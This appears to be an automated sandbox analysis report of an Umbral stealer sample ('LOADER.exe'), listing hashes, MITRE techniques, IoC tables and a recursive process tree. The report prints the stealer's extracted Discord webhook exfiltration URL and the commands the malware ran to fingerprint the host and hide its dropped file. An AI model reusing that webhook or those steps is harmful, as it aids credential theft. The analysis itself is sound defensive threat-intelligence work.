umbral | 1eac7f1debb3f6c96260977b111028ae3dcf2d7907e1a2c916044c3942e9e05d

Analysis

max time kernel
113s
max time network
218s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
16-08-2024 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LOADER.exe
Size

15.5MB
MD5

5f62b2a17cda80f8ef9bf521fde17e42
SHA1

5086572ec9aa37b50590a36300b374160d8ffacb
SHA256

1eac7f1debb3f6c96260977b111028ae3dcf2d7907e1a2c916044c3942e9e05d
SHA512

24e72654fd5fbe2a646d0e9b9ca239852d630de426002f3b7ac56c5a16c12037c1559a6e8420e535fd4fd7865b4f8ec2c5330f83b0781287251a4076d3a0a139
SSDEEP

393216:HV0WnD+wO04M1o4FJO22+j79cC/QWXtsVy5J58mu+F2f3nDNzxg:1dniwO04L4+l+j79H/QW3zFIPpa

Score

10^/10

umbral credential_access discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1270702077819097171/aH_welMr5BV0d8bcgAcZ1YefXQZm7768r2-61SpHYIVQE_jXaf2nibmp1wX6DuE5bOcQ

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000800000001aac3-14.dat	family_umbral
behavioral3/memory/784-16-0x0000020F0AD70000-0x0000020F0ADB0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 60 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1716	powershell.exe
1300	powershell.exe
4280	powershell.exe
4856	powershell.exe
4336	powershell.exe
788	powershell.exe
352	powershell.exe
4400	powershell.exe
4264	powershell.exe
3532	powershell.exe
5028	powershell.exe
3556	powershell.exe
2184	powershell.exe
636	powershell.exe
1976	powershell.exe
1604	powershell.exe
1248	powershell.exe
2836	powershell.exe
748	powershell.exe
2160	powershell.exe
3524	powershell.exe
4716	powershell.exe
2684	powershell.exe
3184	powershell.exe
4260	powershell.exe
4168	powershell.exe
2464	powershell.exe
216	powershell.exe
4668	powershell.exe
4596	powershell.exe
3904	powershell.exe
3860	powershell.exe
3696	powershell.exe
1176	powershell.exe
2164	powershell.exe
732	powershell.exe
1804	powershell.exe
2372	powershell.exe
3860	powershell.exe
204	powershell.exe
4492	powershell.exe
4732	powershell.exe
3796	powershell.exe
2184	powershell.exe
2968	powershell.exe
2108	powershell.exe
820	powershell.exe
2344	powershell.exe
4608	powershell.exe
4988	powershell.exe
1824	powershell.exe
436	powershell.exe
4768	powershell.exe
1380	powershell.exe
348	powershell.exe
5000	powershell.exe
4472	powershell.exe
1756	powershell.exe
4100	powershell.exe
392	powershell.exe

Drops file in Drivers directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Executes dropped EXE 64 IoCs

pid	Process
2192	loaderexp.exe
784	Umbral.exe
3980	loaderexp.exe
1936	Umbral.exe
3212	loaderexp.exe
2872	Umbral.exe
1488	loaderexp.exe
560	Umbral.exe
2336	loaderexp.exe
2228	Umbral.exe
4388	loaderexp.exe
4288	Umbral.exe
1300	loaderexp.exe
2764	Umbral.exe
4128	loaderexp.exe
3144	Umbral.exe
2096	loaderexp.exe
4796	Umbral.exe
1472	loaderexp.exe
3380	Umbral.exe
4280	Umbral.exe
4460	loaderexp.exe
2340	loaderexp.exe
4304	Umbral.exe
4800	loaderexp.exe
4812	Umbral.exe
2344	loaderexp.exe
4704	Umbral.exe
732	loaderexp.exe
2176	Umbral.exe
2300	loaderexp.exe
3300	Umbral.exe
5040	loaderexp.exe
388	Umbral.exe
2108	loaderexp.exe
4332	Umbral.exe
3136	loaderexp.exe
2160	Umbral.exe
5028	loaderexp.exe
4236	Umbral.exe
4476	loaderexp.exe
732	Umbral.exe
5064	loaderexp.exe
4692	Umbral.exe
4100	loaderexp.exe
2076	Umbral.exe
2164	loaderexp.exe
2248	Umbral.exe
1564	loaderexp.exe
3108	Umbral.exe
2028	loaderexp.exe
4824	Umbral.exe
3708	loaderexp.exe
3496	Umbral.exe
4516	loaderexp.exe
3936	Umbral.exe
2376	loaderexp.exe
1572	Umbral.exe
4600	loaderexp.exe
4596	Umbral.exe
2344	loaderexp.exe
4028	Umbral.exe
572	loaderexp.exe
4296	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 28 IoCs

Web Service

T1102

flow	ioc
42	discord.com
12	discord.com
59	discord.com
89	discord.com
19	discord.com
26	discord.com
68	discord.com
74	discord.com
11	discord.com
35	discord.com
67	discord.com
118	discord.com
20	discord.com
27	discord.com
101	discord.com
110	discord.com
102	discord.com
109	discord.com
43	discord.com
53	discord.com
75	discord.com
88	discord.com
95	discord.com
34	discord.com
52	discord.com
60	discord.com
94	discord.com
119	discord.com

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
46	ip-api.com
64	ip-api.com
71	ip-api.com
87	ip-api.com
98	ip-api.com
106	ip-api.com
5	ip-api.com
34	ip-api.com
56	ip-api.com
78	ip-api.com
16	ip-api.com
23	ip-api.com
31	ip-api.com
113	ip-api.com
39	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 28 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3868	PING.EXE
2744	PING.EXE
2308	cmd.exe
396	cmd.exe
3736	cmd.exe
2112	cmd.exe
224	cmd.exe
2316	cmd.exe
3500	PING.EXE
1316	PING.EXE
1572	cmd.exe
1440	cmd.exe
4288	cmd.exe
4568	PING.EXE
1364	cmd.exe
3300	PING.EXE
3948	PING.EXE
4132	PING.EXE
4732	PING.EXE
2468	PING.EXE
960	PING.EXE
1812	cmd.exe
4372	cmd.exe
740	cmd.exe
5004	PING.EXE
1240	PING.EXE
728	cmd.exe
1976	PING.EXE

Detects videocard installed 1 TTPs 14 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2328	wmic.exe
740	wmic.exe
2876	wmic.exe
1368	wmic.exe
5092	wmic.exe
1548	wmic.exe
1140	wmic.exe
3600	wmic.exe
3248	wmic.exe
4660	wmic.exe
1460	wmic.exe
1456	wmic.exe
1416	wmic.exe
436	wmic.exe

Runs ping.exe 1 TTPs 14 IoCs

Remote System Discovery

T1018

pid	Process
1316	PING.EXE
3500	PING.EXE
960	PING.EXE
4132	PING.EXE
5004	PING.EXE
4732	PING.EXE
2468	PING.EXE
1976	PING.EXE
3868	PING.EXE
2744	PING.EXE
3948	PING.EXE
4568	PING.EXE
1240	PING.EXE
3300	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
784	Umbral.exe
1380	powershell.exe
1380	powershell.exe
1380	powershell.exe
1176	powershell.exe
1176	powershell.exe
1176	powershell.exe
2464	powershell.exe
2464	powershell.exe
2464	powershell.exe
4272	powershell.exe
4272	powershell.exe
4272	powershell.exe
216	powershell.exe
216	powershell.exe
216	powershell.exe
2228	Umbral.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe
3556	powershell.exe
3556	powershell.exe
3556	powershell.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
2184	powershell.exe
2184	powershell.exe
2184	powershell.exe
4796	Umbral.exe
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe
636	powershell.exe
636	powershell.exe
636	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
632	powershell.exe
632	powershell.exe
632	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
4812	Umbral.exe
1824	powershell.exe
1824	powershell.exe
1824	powershell.exe
1804	powershell.exe
1804	powershell.exe
1804	powershell.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
4596	powershell.exe
4596	powershell.exe
4596	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	784	Umbral.exe
Token: SeIncreaseQuotaPrivilege	240	wmic.exe
Token: SeSecurityPrivilege	240	wmic.exe
Token: SeTakeOwnershipPrivilege	240	wmic.exe
Token: SeLoadDriverPrivilege	240	wmic.exe
Token: SeSystemProfilePrivilege	240	wmic.exe
Token: SeSystemtimePrivilege	240	wmic.exe
Token: SeProfSingleProcessPrivilege	240	wmic.exe
Token: SeIncBasePriorityPrivilege	240	wmic.exe
Token: SeCreatePagefilePrivilege	240	wmic.exe
Token: SeBackupPrivilege	240	wmic.exe
Token: SeRestorePrivilege	240	wmic.exe
Token: SeShutdownPrivilege	240	wmic.exe
Token: SeDebugPrivilege	240	wmic.exe
Token: SeSystemEnvironmentPrivilege	240	wmic.exe
Token: SeRemoteShutdownPrivilege	240	wmic.exe
Token: SeUndockPrivilege	240	wmic.exe
Token: SeManageVolumePrivilege	240	wmic.exe
Token: 33	240	wmic.exe
Token: 34	240	wmic.exe
Token: 35	240	wmic.exe
Token: 36	240	wmic.exe
Token: SeIncreaseQuotaPrivilege	240	wmic.exe
Token: SeSecurityPrivilege	240	wmic.exe
Token: SeTakeOwnershipPrivilege	240	wmic.exe
Token: SeLoadDriverPrivilege	240	wmic.exe
Token: SeSystemProfilePrivilege	240	wmic.exe
Token: SeSystemtimePrivilege	240	wmic.exe
Token: SeProfSingleProcessPrivilege	240	wmic.exe
Token: SeIncBasePriorityPrivilege	240	wmic.exe
Token: SeCreatePagefilePrivilege	240	wmic.exe
Token: SeBackupPrivilege	240	wmic.exe
Token: SeRestorePrivilege	240	wmic.exe
Token: SeShutdownPrivilege	240	wmic.exe
Token: SeDebugPrivilege	240	wmic.exe
Token: SeSystemEnvironmentPrivilege	240	wmic.exe
Token: SeRemoteShutdownPrivilege	240	wmic.exe
Token: SeUndockPrivilege	240	wmic.exe
Token: SeManageVolumePrivilege	240	wmic.exe
Token: 33	240	wmic.exe
Token: 34	240	wmic.exe
Token: 35	240	wmic.exe
Token: 36	240	wmic.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeIncreaseQuotaPrivilege	1380	powershell.exe
Token: SeSecurityPrivilege	1380	powershell.exe
Token: SeTakeOwnershipPrivilege	1380	powershell.exe
Token: SeLoadDriverPrivilege	1380	powershell.exe
Token: SeSystemProfilePrivilege	1380	powershell.exe
Token: SeSystemtimePrivilege	1380	powershell.exe
Token: SeProfSingleProcessPrivilege	1380	powershell.exe
Token: SeIncBasePriorityPrivilege	1380	powershell.exe
Token: SeCreatePagefilePrivilege	1380	powershell.exe
Token: SeBackupPrivilege	1380	powershell.exe
Token: SeRestorePrivilege	1380	powershell.exe
Token: SeShutdownPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeSystemEnvironmentPrivilege	1380	powershell.exe
Token: SeRemoteShutdownPrivilege	1380	powershell.exe
Token: SeUndockPrivilege	1380	powershell.exe
Token: SeManageVolumePrivilege	1380	powershell.exe
Token: 33	1380	powershell.exe
Token: 34	1380	powershell.exe
Token: 35	1380	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4472 wrote to memory of 3652	4472	LOADER.exe	70
PID 4472 wrote to memory of 3652	4472	LOADER.exe	70
PID 4472 wrote to memory of 2192	4472	LOADER.exe	71
PID 4472 wrote to memory of 2192	4472	LOADER.exe	71
PID 4472 wrote to memory of 784	4472	LOADER.exe	72
PID 4472 wrote to memory of 784	4472	LOADER.exe	72
PID 784 wrote to memory of 240	784	Umbral.exe	74
PID 784 wrote to memory of 240	784	Umbral.exe	74
PID 784 wrote to memory of 4044	784	Umbral.exe	76
PID 784 wrote to memory of 4044	784	Umbral.exe	76
PID 784 wrote to memory of 1380	784	Umbral.exe	78
PID 784 wrote to memory of 1380	784	Umbral.exe	78
PID 3652 wrote to memory of 1876	3652	loader.exe	81
PID 3652 wrote to memory of 1876	3652	loader.exe	81
PID 3652 wrote to memory of 3980	3652	loader.exe	82
PID 3652 wrote to memory of 3980	3652	loader.exe	82
PID 3652 wrote to memory of 1936	3652	loader.exe	83
PID 3652 wrote to memory of 1936	3652	loader.exe	83
PID 784 wrote to memory of 1176	784	Umbral.exe	84
PID 784 wrote to memory of 1176	784	Umbral.exe	84
PID 784 wrote to memory of 2464	784	Umbral.exe	86
PID 784 wrote to memory of 2464	784	Umbral.exe	86
PID 784 wrote to memory of 4272	784	Umbral.exe	88
PID 784 wrote to memory of 4272	784	Umbral.exe	88
PID 1876 wrote to memory of 1948	1876	loader.exe	90
PID 1876 wrote to memory of 1948	1876	loader.exe	90
PID 1876 wrote to memory of 3212	1876	loader.exe	91
PID 1876 wrote to memory of 3212	1876	loader.exe	91
PID 1876 wrote to memory of 2872	1876	loader.exe	92
PID 1876 wrote to memory of 2872	1876	loader.exe	92
PID 784 wrote to memory of 4812	784	Umbral.exe	93
PID 784 wrote to memory of 4812	784	Umbral.exe	93
PID 784 wrote to memory of 3764	784	Umbral.exe	95
PID 784 wrote to memory of 3764	784	Umbral.exe	95
PID 784 wrote to memory of 4232	784	Umbral.exe	97
PID 784 wrote to memory of 4232	784	Umbral.exe	97
PID 784 wrote to memory of 216	784	Umbral.exe	99
PID 784 wrote to memory of 216	784	Umbral.exe	99
PID 1948 wrote to memory of 2252	1948	loader.exe	101
PID 1948 wrote to memory of 2252	1948	loader.exe	101
PID 1948 wrote to memory of 1488	1948	loader.exe	102
PID 1948 wrote to memory of 1488	1948	loader.exe	102
PID 1948 wrote to memory of 560	1948	loader.exe	125
PID 1948 wrote to memory of 560	1948	loader.exe	125
PID 784 wrote to memory of 1548	784	Umbral.exe	104
PID 784 wrote to memory of 1548	784	Umbral.exe	104
PID 784 wrote to memory of 3736	784	Umbral.exe	106
PID 784 wrote to memory of 3736	784	Umbral.exe	106
PID 3736 wrote to memory of 3868	3736	cmd.exe	108
PID 3736 wrote to memory of 3868	3736	cmd.exe	108
PID 2252 wrote to memory of 3860	2252	loader.exe	109
PID 2252 wrote to memory of 3860	2252	loader.exe	109
PID 2252 wrote to memory of 2336	2252	loader.exe	161
PID 2252 wrote to memory of 2336	2252	loader.exe	161
PID 2252 wrote to memory of 2228	2252	loader.exe	111
PID 2252 wrote to memory of 2228	2252	loader.exe	111
PID 2228 wrote to memory of 2712	2228	Umbral.exe	112
PID 2228 wrote to memory of 2712	2228	Umbral.exe	112
PID 2228 wrote to memory of 1628	2228	Umbral.exe	114
PID 2228 wrote to memory of 1628	2228	Umbral.exe	114
PID 2228 wrote to memory of 5000	2228	Umbral.exe	167
PID 2228 wrote to memory of 5000	2228	Umbral.exe	167
PID 3860 wrote to memory of 2788	3860	loader.exe	174
PID 3860 wrote to memory of 2788	3860	loader.exe	174

Views/modifies file attributes 1 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3980	attrib.exe
4576	attrib.exe
3344	attrib.exe
4044	attrib.exe
1316	attrib.exe
1468	attrib.exe
2864	attrib.exe
1292	attrib.exe
4064	attrib.exe
1628	attrib.exe
3408	attrib.exe
2872	attrib.exe
3108	attrib.exe
448	attrib.exe
3660	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LOADER.exe
"C:\Users\Admin\AppData\Local\Temp\LOADER.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4472
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3652
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1948
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2252
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        
        PID:560
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        14⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        15⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        16⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        17⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        18⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        19⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        20⤵
        
        PID:244
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        21⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        22⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        23⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        24⤵
        
        PID:4572
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        25⤵
        
        PID:816
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        26⤵
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        27⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        28⤵
        
        PID:3696
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        29⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        30⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        31⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        32⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        33⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        34⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        35⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        36⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        37⤵
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        38⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        39⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        40⤵
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        41⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        42⤵
        
        PID:240
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        43⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        44⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        45⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        46⤵
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        47⤵
        
        PID:476
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        48⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        49⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        50⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        51⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        52⤵
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        53⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        54⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        55⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        56⤵
        
        PID:4240
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        57⤵
        
        PID:1176
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        58⤵
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        59⤵
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        60⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        61⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        62⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        63⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        64⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        65⤵
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        66⤵
        
        PID:204
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        67⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        68⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        69⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        70⤵
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        71⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        72⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        73⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        74⤵
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        74⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        74⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        73⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        73⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        72⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        72⤵
        
        PID:3764
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        71⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        71⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        70⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        70⤵
        
        PID:348
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        71⤵
        
        PID:4296
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        71⤵
        Views/modifies file attributes
        
        PID:1468
        
